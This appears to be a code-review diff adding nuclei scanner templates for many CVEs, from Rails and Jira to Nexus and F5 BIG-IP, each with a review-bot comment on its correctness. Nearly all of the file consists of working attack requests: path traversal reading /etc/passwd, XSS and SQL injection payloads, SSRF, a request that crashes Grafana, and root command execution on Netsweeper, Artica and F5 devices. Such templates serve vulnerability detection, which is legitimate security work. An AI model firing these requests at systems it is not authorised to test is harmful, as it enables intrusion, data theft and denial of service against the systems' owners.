||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- 'root:[x*]:0:0:'
|
||||
part: body
|
|
@ -0,0 +1,23 @@
|
|||
id: CVE-2019-5418
|
||||
|
||||
info:
|
||||
name: File Content Disclosure on Rails
|
||||
author: omarkurt
|
||||
severity: medium
|
||||
# reference: https://github.com/omarkurt/CVE-2019-5418
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
headers:
|
||||
Accept: ../../../../../../../../etc/passwd{{
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
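Review bot: the header value `../../../../../../../../etc/passwd{{` ends in an unbalanced `{{`, which is also the opening of nuclei's `{{...}}` expression syntax; quote the value and confirm the template engine passes the trailing `{{` through unchanged, since the Rails bug depends on it. Requesting only `{{BaseURL}}` will also miss applications whose vulnerable `render file:` call sits on another route, so a comment on that limitation (or additional paths) would set expectations.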
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2019-6112
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Sell Media v2.4.1 - Cross-Site Scripting
|
||||
author: dwisiswant0
|
||||
severity: medium
|
||||
|
||||
# A Cross-site scripting (XSS) vulnerability
|
||||
# in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress
|
||||
# allows remote attackers to inject arbitrary web script or HTML
|
||||
# via the keyword parameter (aka $search_term or the Search field).
|
||||
# --
|
||||
# References:
|
||||
# > https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "id=\"sell-media-search-text\" class=\"sell-media-search-text\""
|
||||
- "alert(1337)"
|
||||
condition: and
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2019-7609
|
||||
|
||||
info:
|
||||
name: Kibana Timelion Arbitrary Code Execution
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
|
||||
# Kibana versions before 5.6.15 and 6.6.1
|
||||
# contain an arbitrary code execution flaw in the Timelion visualizer.
|
||||
# An attacker with access to the Timelion application could send a request
|
||||
# that will attempt to execute javascript code.
|
||||
# This could possibly lead to an attacker executing arbitrary commands
|
||||
# with permissions of the Kibana process on the host system.
|
||||
# --
|
||||
# References:
|
||||
# - https://github.com/mpgn/CVE-2019-7609
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/api/timelion/run"
|
||||
- "{{BaseURL}}:5601/api/timelion/run"
|
||||
headers:
|
||||
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
|
||||
Content-Type: "application/json; charset=utf-8"
|
||||
body: "{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "seriesList"
|
||||
part: body
|
||||
- type: word
|
||||
words:
|
||||
- "Content-Type: application/json"
|
||||
part: header
|
||||
- type: status
|
||||
status:
|
||||
- 200
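Review bot: Kibana refuses POST requests to its API that lack a `kbn-xsrf` header, so this request is likely rejected before Timelion sees the `.es(*)` sheet; add `kbn-xsrf: true` under `headers`. The matchers (`seriesList`, `Content-Type: application/json`, 200) only prove that the Timelion endpoint evaluates an expression, not that the version is vulnerable, so a `critical` result named `Arbitrary Code Execution` will also fire on patched instances; mark it as detection. `{{BaseURL}}:5601/...` has the port-suffix problem noted on CVE-2019-2588.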
|
|
@ -0,0 +1,22 @@
|
|||
id: CVE-2019-8449
|
||||
|
||||
info:
|
||||
name: JIRA Unauthenticated Sensitive Information Disclosure
|
||||
author: Harsh Bothra
|
||||
severity: medium
|
||||
|
||||
# source:- https://www.doyler.net/security-not-included/more-jira-enumeration
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true'
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- '{"users":{"users":'
|
||||
part: body
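Review bot: `maxResults=50000` asks the target to return up to fifty thousand user records when the matcher only needs the `{"users":{"users":` prefix; use a small value so the probe does not bulk-export the user directory into scan logs. Otherwise the template is consistent with the other Jira checks in this commit.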
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2019-8451
|
||||
|
||||
info:
|
||||
name: JIRA SSRF in the /plugins/servlet/gadgets/makeRequest resource
|
||||
author: "TechbrunchFR"
|
||||
severity: medium
|
||||
|
||||
# On September 9, Atlassian released version 8.4.0 for Jira Core and Jira Software, which included a fix for an important
|
||||
# security issue reported in August 2019.
|
||||
|
||||
# CVE-2019-8451 is a pre-authentication server-side request forgery (SSRF) vulnerability found in
|
||||
# the /plugins/servlet/gadgets/makeRequest resource. The vulnerability exists due to “a logic bug” in the JiraWhitelist class.
|
||||
# An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable
|
||||
# Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal
|
||||
# network resources.
|
||||
# https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
|
||||
# https://twitter.com/benmontour/status/1177250393220239360
|
||||
# https://twitter.com/ojensen5115/status/1176569607357730817
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/plugins/servlet/gadgets/makeRequest?url=https://{{Hostname}}:1337@example.com'
|
||||
headers:
|
||||
X-Atlassian-token: no-check
|
||||
matchers:
|
||||
- type: word
|
||||
name: ssrf-response-body
|
||||
words:
|
||||
- '<p>This domain is for use in illustrative examples in documents.'
|
||||
part: body
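Review bot: the check relies on the target fetching `example.com` (through the `https://{{Hostname}}:1337@example.com` userinfo form) and on that page still containing `<p>This domain is for use in illustrative examples in documents.`; a target without internet egress reports clean. Add `matchers-condition: and` with a `status` matcher and mention the egress dependency in the comments, which are otherwise the most complete in this commit.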
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2019-8903
|
||||
|
||||
info:
|
||||
name: Totaljs - Unathenticated Directory Traversal
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "apache2.conf"
|
||||
part: body
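Review bot: `Unathenticated` in the name should be `Unauthenticated`. The matcher `apache2.conf` assumes the traversal lands on a Debian default `index.html`, so a Total.js host serving any other page is reported clean; a file with fixed, distinctive content (the `/etc/passwd` regex used elsewhere in this commit) would generalise better.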
|
|
@ -0,0 +1,19 @@
|
|||
id: CVE-2019-8982
|
||||
info:
|
||||
name: Wavemaker Studio 6.6 LFI/SSRF
|
||||
author: madrobot
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
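Review bot: `inUrl=file///etc/passwd` omits the colon of the usual `file:///` scheme; if that form is the documented one, say so in a comment, otherwise fix it, since as written the check may fail against a target that is actually vulnerable. No reference line is given to settle it either way.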
|
|
@ -0,0 +1,22 @@
|
|||
id: CVE-2019-9978
|
||||
|
||||
info:
|
||||
name: WordPress social-warfare RFI
|
||||
author: madrobot & dwisiswant0
|
||||
severity: critical
|
||||
|
||||
# Reference:- https://github.com/mpgn/CVE-2019-9978
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://burpcollaborator.net"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "Burp Collabolator Server"
|
||||
part: body
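Review bot: the word `Burp Collabolator Server` is misspelt (`Collabolator`), so it can never match the page the Burp host returns (`<h1>Burp Collaborator Server</h1>`, as CVE-2019-18394 in this commit spells it); correct it to `Burp Collaborator Server`. The same egress dependency as the other Collaborator-based templates applies.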
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2020-10199
|
||||
|
||||
info:
|
||||
name: Nexus Repository Manager 3 RCE
|
||||
auhtor: hetroublemakr
|
||||
severity: high
|
||||
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- '{{BaseURL}}/rest/beta/repositories/go/group'
|
||||
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
body: '{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ 1337 * 1337 }"]}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "1787569"
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 400
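Review bot: `auhtor: hetroublemakr` is a typo for `author`, which leaves the info block without an author. The request sends no credentials although the Sonatype advisory it references describes an issue reachable by authenticated users, so an unauthenticated scan will normally get a rejection rather than the `1787569` evaluation; and if the server does accept the body, it creates a group repository named `internal`, which deserves a comment.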
|
|
@ -0,0 +1,24 @@
|
|||
id: CVE-2020-10204
|
||||
|
||||
info:
|
||||
name: Sonatype Nexus Repository RCE
|
||||
auhtor: hetroublemakr
|
||||
severity: high
|
||||
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- '{{BaseURL}}/extdirect'
|
||||
|
||||
body: '{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "1787569"
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
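Review bot: `auhtor:` is again a typo for `author`. The payload `$\\c{1337*1337` lacks the closing `}` that the CVE-2020-10199 template's `$\\c{ 1337 * 1337 }` has, so the expression cannot evaluate to the `1787569` the matcher expects; fix the brace. The request also sends no `Content-Type` and no credentials while performing an `update` of the `anonymous` user through `/extdirect`, a state change on the target, and the reference URL is the CVE-2020-10199 article, so confirm it covers this CVE.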
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2020-1147
|
||||
|
||||
info:
|
||||
name: RCE at SharePoint Server (.NET Framework & Visual Studio) detection
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
|
||||
# Ref:
|
||||
# - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147
|
||||
# - https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/_layouts/15/listform.aspx?PageType=1&ListId=%7B13371337-1337-1337-1337-133713371337%7D"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "List does not exist"
|
||||
- "It may have been deleted by another user"
|
||||
part: body
|
||||
condition: and
|
||||
- type: word
|
||||
words:
|
||||
- "Microsoft-IIS"
|
||||
- "X-SharePointHealthScore"
|
||||
- "SharePointError"
|
||||
- "SPRequestGuid"
|
||||
- "MicrosoftSharePointTeamServices"
|
||||
condition: or
|
||||
part: header
|
||||
- type: status
|
||||
status:
|
||||
- 200
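Review bot: every matcher here (`List does not exist`, the IIS/SharePoint headers, 200) is satisfied by any SharePoint server regardless of patch level, so a `critical` hit means only that SharePoint is present; since the name already says `detection`, lower the severity or state in a comment that the result needs manual confirmation against the MSRC advisory.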
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2020-12720
|
||||
|
||||
info:
|
||||
name: CVE-2020-12720 vBulletin SQLI
|
||||
author: pdnuclei - projectdiscovery.io
|
||||
severity: critical
|
||||
|
||||
# Source https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
|
||||
# This template supports the detection part only.
|
||||
# Do not test any website without permission
|
||||
# https://github.com/swisskyrepo/nuclei-templates/blob/20179794c2030144ec85f0231a8d455b5d7e35c5/cves/CVE-2020-12720.yaml
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Connection: keep-alive
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 218
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "vbulletinrce"
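Review bot: `Content-Length: 218` does not match the body as written, which counts to 220 bytes; a wrong length either truncates the injection or leaves the server waiting, so remove the header and let the client compute it. The comment says detection only, yet the UNION query already evaluates `@@version` on the target; that is acceptable for confirmation, but add a `status` matcher under `matchers-condition: and` so a reflected `vbulletinrce` string alone is not enough.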
|
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2020-13167
|
||||
|
||||
info:
|
||||
name: Netsweeper WebAdmin unixlogin.php Python Code Injection
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
|
||||
# This template exploits a Python code injection in the Netsweeper
|
||||
# WebAdmin component's unixlogin.php script, for versions 6.4.4 and
|
||||
# prior, to execute code as the root user.
|
||||
|
||||
# Authentication is bypassed by sending a random whitelisted Referer
|
||||
# header in each request.
|
||||
|
||||
# Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
|
||||
# Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
|
||||
# been confirmed exploitable.
|
||||
|
||||
# References:
|
||||
# - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
|
||||
# - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
# Payload on hex: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
|
||||
- "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
|
||||
- "{{BaseURL}}/webadmin/out"
|
||||
headers:
|
||||
Referer: "http://{{Hostname}}/webadmin/admin/service_manager_data.php"
|
||||
User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)"
|
||||
Connection: "close"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "nonexistent"
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
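Review bot: this runs as root on the target and writes `/usr/local/netsweeper/webadmin/out`, which the second path then reads and the template never removes, so every scan leaves a web-readable file behind; either clean up or prove execution without touching disk. `# Payload on hex:` should read `# Payload in hex:`, and the whitelisted `Referer` bypass header deserves a pointer to the advisory line that documents it. Both paths share the same matchers under `matchers-condition: and`, so make sure the first response cannot also contain `nonexistent`.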
|
|
@ -0,0 +1,21 @@
|
|||
id: CVE-2020-13379
|
||||
|
||||
info:
|
||||
name: Unauthenticated Grafana DoS
|
||||
author: pxmme1337
|
||||
severity: medium
|
||||
|
||||
# Source:- https://www.exploit-db.com/exploits/48638
|
||||
# WARNING
|
||||
# This vulnerability results in complete crashing of the grafana-server application.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D'
|
||||
- '{{BaseURL}}/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D'
|
||||
- "{{BaseURL}}/"
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 502
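Review bot: the first path `'{{BaseURL}}avatar/...'` has no `/` after `{{BaseURL}}`, producing a malformed URL; drop it, since the second path is the correct form. The template crashes `grafana-server` by design (per the WARNING) and then checks `/` for a 502, which any reverse proxy returns for any backend outage; this should not run in a default scan, so tag it so it can be excluded and say explicitly that a positive result means the service is down.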
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2020-17505
|
||||
|
||||
info:
|
||||
name: Artica Web Proxy 4.30 OS Command Injection
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
|
||||
# Artica Web Proxy 4.30.00000000
|
||||
# allows an authenticated remote attacker
|
||||
# to inject commands via the service-cmds parameter in cyrus.php.
|
||||
# These commands are executed with root
|
||||
# privileges via service_cmds_peform.
|
||||
# -
|
||||
# References:
|
||||
# > https://blog.max0x4141.com/post/artica_proxy/
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: */*
|
||||
Connection: close
|
||||
|
||||
- |
|
||||
GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: */*
|
||||
Connection: close
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "array(2)"
|
||||
- "Position: ||whoami||"
|
||||
- "root"
|
||||
condition: and
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
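Review bot: the first raw request reuses the CVE-2020-17506 SQL-injection bypass to obtain a session (`cookie-reuse: true`) and the second runs `||whoami||`, so this template performs both the bypass and command execution on the target; that is acceptable for a `high` template, but say so in the comments, which describe the issue as requiring authentication. Of the matched words, `root` is weak and `Position: ||whoami||` is the distinctive one; the `# -` separator is `# --` in the other templates.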
|
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2020-17506
|
||||
|
||||
info:
|
||||
name: Artica Web Proxy 4.30 Authentication Bypass
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
|
||||
# Artica Web Proxy 4.30.00000000
|
||||
# allows remote attacker to bypass privilege detection
|
||||
# and gain web backend administrator privileges
|
||||
# through SQL injection of the apikey parameter in fw.login.php.
|
||||
# -
|
||||
# References:
|
||||
# > https://blog.max0x4141.com/post/artica_proxy/
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
|
||||
redirects: true
|
||||
max-redirects: 1
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "artica-applianc"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 301
|
||||
- 302
|
||||
condition: or
|
||||
- type: word
|
||||
name: session
|
||||
words:
|
||||
- "PHPSESSID"
|
||||
part: header
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
- "PHPSESSID"
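Review bot: with `redirects: true` and `max-redirects: 1` the matchers run against the response after the redirect, while the `PHPSESSID` `Set-Cookie` is normally issued on the first response, so the header matcher and the `kval` extractor may miss it; either disable redirects or check that the cookie survives the hop. `artica-applianc` looks like a truncated token; if the truncation is intentional, comment it. `severity: critical` is justified only if the session really grants administrator access, which the matchers do not verify.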
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2020-2096
|
||||
|
||||
info:
|
||||
name: Jenkins Gitlab Hook XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/gitlab/build_now%3Csvg/onload=alert(1337)%3E"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<svg/onload=alert(1337)>"
|
||||
part: body
|
|
@ -0,0 +1,24 @@
|
|||
id: CVE-2020-3187
|
||||
|
||||
# Reference: https://twitter.com/aboul3la/status/1286809567989575685
|
||||
|
||||
info:
|
||||
name: CVE-2020-3187
|
||||
author: KareemSe1im
|
||||
severity: High
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/+CSCOE+/session_password.html"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- webvpn
|
||||
- Webvpn
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
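Review bot: `name: CVE-2020-3187` repeats the id; give it a descriptive name as every other template does, and `severity: High` should be lowercase. The matcher looks for `webvpn`/`Webvpn` in headers with a 200 on `/+CSCOE+/session_password.html`, which any ASA or FTD with WebVPN enabled returns whether or not it is patched, so this fingerprints WebVPN rather than checking the vulnerability; say so in a comment, and move the `# Reference` line under `info:` where the rest of the commit keeps references.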
|
|
@ -0,0 +1,19 @@
|
|||
id: CVE-2020-3452
|
||||
|
||||
# Source: https://twitter.com/aboul3la/status/1286012324722155525
|
||||
|
||||
info:
|
||||
name: CVE-2020-3452
|
||||
author: pdteam
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "INTERNAL_PASSWORD_ENABLED"
|
||||
- "CONF_VIRTUAL_KEYBOARD"
|
||||
condition: and
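Review bot: `name: CVE-2020-3452` should be descriptive like the others. The `lang=../` traversal against `portal_inc.lua` with `INTERNAL_PASSWORD_ENABLED` and `CONF_VIRTUAL_KEYBOARD` under `condition: and` is specific, but there is no `status` matcher or `matchers-condition`; add them. The `# Source` comment sits before `info:` here while the rest of the commit places references after it.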
|
|
@ -0,0 +1,24 @@
|
|||
id: CVE-2020-5284
|
||||
|
||||
info:
|
||||
name: Next.js .next/ limited path traversal
|
||||
author: Harsh & Rahul & dwisiswant0
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/_next/static/../server/pages-manifest.json"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '\{"/_app":".*?_app\.js"'
|
||||
part: body
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
part: header
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,22 @@
|
|||
id: CVE-2020-5405
|
||||
|
||||
info:
|
||||
name: Spring Cloud Directory Traversal
|
||||
author: Harsh Bothra
|
||||
severity: High
|
||||
|
||||
# source:- https://nvd.nist.gov/vuln/detail/CVE-2020-5405
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
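Review bot: `severity: High` should be lowercase `high`. This template, CVE-2019-3799 and CVE-2020-5410 all use the same `root:[x*]:0:0:` regex; a `/etc/passwd` whose root password field is neither `x` nor `*` is missed, so consider the broader `root:.*:0:0:` form across the three.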
|
|
@ -0,0 +1,21 @@
|
|||
id: CVE-2020-5410
|
||||
|
||||
info:
|
||||
name: Directory Traversal in Spring Cloud Config Server
|
||||
author: mavericknerd
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}:8080/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
|
||||
- "{{BaseURL}}:8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
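Review bot: both paths hardcode a port (`{{BaseURL}}:8080/...`, `{{BaseURL}}:8888/...`) and there is no plain `{{BaseURL}}/...` variant, so a Config Server behind a proxy on 80/443 or on any other port is never probed, and an input that already carries a port yields `host:8888:8080`; keep one port-less path and leave port selection to the input list. No reference is given for the `%23foo/development` form.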
|
|
@ -0,0 +1,64 @@
|
|||
id: CVE-2020-5902
|
||||
|
||||
info:
|
||||
name: F5 BIG-IP TMUI RCE
|
||||
author: madrobot & dwisiswant0 & ringo
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
|
||||
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"
|
||||
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license"
|
||||
- "{{BaseURL}}/hsqldb%0a"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
- "BIG-IP release ([\\d.]+)"
|
||||
- "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}"
|
||||
- "HSQL Database Engine Servlet"
|
||||
condition: or
|
||||
part: body
|
||||
- raw:
|
||||
- |
|
||||
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
|
||||
command=create%20cli%20alias%20private%20list%20command%20bash
|
||||
- |
|
||||
POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
|
||||
fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d
|
||||
- |
|
||||
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
|
||||
command=list%20%2Ftmp%2Fnonexistent
|
||||
- |
|
||||
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
|
||||
command=delete%20cli%20alias%20private%20list
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
